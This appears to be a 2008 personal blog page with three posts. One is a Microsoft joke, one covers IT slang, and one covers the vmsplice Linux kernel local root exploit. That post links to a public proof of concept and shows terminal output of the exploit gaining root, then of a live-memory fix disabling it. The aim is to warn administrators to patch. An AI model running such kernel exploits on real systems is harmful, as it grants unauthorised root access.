A true WTF Microsoft style
February 20th, 2008
It doesn't happen very often that I see stuff which will make me speechless or just *really* give me this strong WTF feeling.
This one though which I stumbled upon did a great job.
What will be next?
The arch enemies GNU/Linux troll, MacOS imp and the ugly UNIX beast in the list? What do you think?
PS: For more happenings like this I recommend this reading literature for further study ;)
Linux Kernel exploit for 2.6.17 up to 2.6.24.1
February 11th, 2008
Today I encountered some serious exploits floating around in Full disclosure, Bugtraq and even Slashdot.
Better monkey patch your multiuser machines fast, before the script kiddies get a grip on this...
- LKML about this issue
- Slashdot Article
- Debian Bugtrack about this exploit
- Live Memory fix, which inserts a ret at the beginning of vmsplice()
- Full exploit POC
[0:07][br@gemini:programming/linux/exploits]% ./exploit ----------------------------------- Linux vmsplice Local Root Exploit By qaaz ----------------------------------- [+] mmap: 0x0 .. 0x1000 [+] page: 0x0 [+] page: 0x20 [+] mmap: 0x4000 .. 0x5000 [+] page: 0x4000 [+] page: 0x4020 [+] mmap: 0x1000 .. 0x2000 [+] page: 0x1000 [+] mmap: 0xb7f9e000 .. 0xb7fd0000 [+] root bash: 0STY: command not found root@gemini:~/programming/linux/exploits# whoami root root@gemini:~/programming/linux/exploits#
Beware of the live memory fix as some people experienced memory faults and system breakdowns.
[0:13][br@gemini:programming/linux/exploits]% ./disable_exploit ----------------------------------- Linux vmsplice Local Root Exploit By qaaz ----------------------------------- [+] mmap: 0x0 .. 0x1000 [+] page: 0x0 [+] page: 0x20 [+] mmap: 0x4000 .. 0x5000 [+] page: 0x4000 [+] page: 0x4020 [+] mmap: 0x1000 .. 0x2000 [+] page: 0x1000 [+] mmap: 0xb7fa8000 .. 0xb7fda000 [+] root Exploit gone! [0:14][br@gemini:programming/linux/exploits]% ./exploit ----------------------------------- Linux vmsplice Local Root Exploit By qaaz ----------------------------------- [+] mmap: 0x0 .. 0x1000 [+] page: 0x0 [+] page: 0x20 [+] mmap: 0x4000 .. 0x5000 [+] page: 0x4000 [+] page: 0x4020 [+] mmap: 0x1000 .. 0x2000 [+] page: 0x1000 [+] mmap: 0xb7f7c000 .. 0xb7fae000 [-] vmsplice [0:14][br@gemini:programming/linux/exploits]% whoami br
Update:
For more indepth analysis of what has been going on why, what, etc. find a nice LWN article here.
The right Jargon
February 5th, 2008
Reading from the headline you might think what is he up to now again? Jargon? What the..?
Firing up dict from the commandline we get this explanation what the word actually means:
From The Collaborative International Dictionary of English v.0.48 [gcide]:
Jargon \Jar"gon\, n. [F. jargon, OF. also gargon, perh. akin to
E. garrulous, or gargle.]
1. Confused, unintelligible language; gibberish. "A barbarous
jargon." --Macaulay. "All jargon of the schools." --Prior.
[1913 Webster]
2. Hence: an artificial idiom or dialect; cant language;
slang. Especially, an idiom with frequent use of informal
technical terms, such as acronyms, used by specialists.
"All jargon of the schools." --Prior.
[1913 Webster]
Apart from the obvious first explanation I am actually referring to the second one and want to let you in on a quite funny trade secret. Some of you might have heared that Doctors often talk to each other in latin especially infront of patients using medical slang (e.g. Plumbum oscillans).
So what is the deal you say?
Well people in the IT world tend to have those ways too and most ,,normal'' people don't get them. Some funny expressions are e.g.
| pebkac /peb´kak/ | Problem Exists Between Keyboard And Chair | Userfriendly about it |
| UBD /U·B·D/, n. | User Brain Damage | |
| Fractal Wrongness | The state of being wrong at every conceivable scale of resolution. | More info here |
| ID-ten-T error aka Ten-T error | Ten-T Error is a term often used by tech support operators and computer experts to describe a problem that is due to the user's ignorance instead of a software or hardware malfunction. | Another slight variation is known as a ,,Layer 8 error'' |
... and many more ...
Should you have encountered them then beware and maybe now you understand why your account gets mysteriously deleted sometimes ;).
So do you know any other slangs like the mentioned ones? Maybe from other majors?
PS: Shame on the one who thinks I only know the latin expressions from earlier practice ;P
PPS: Please do read this stuff it is funny as hell and will save your ,,life'' if you are a non tekki.
PPPS: Please don't scold me for spilling those secrets ;)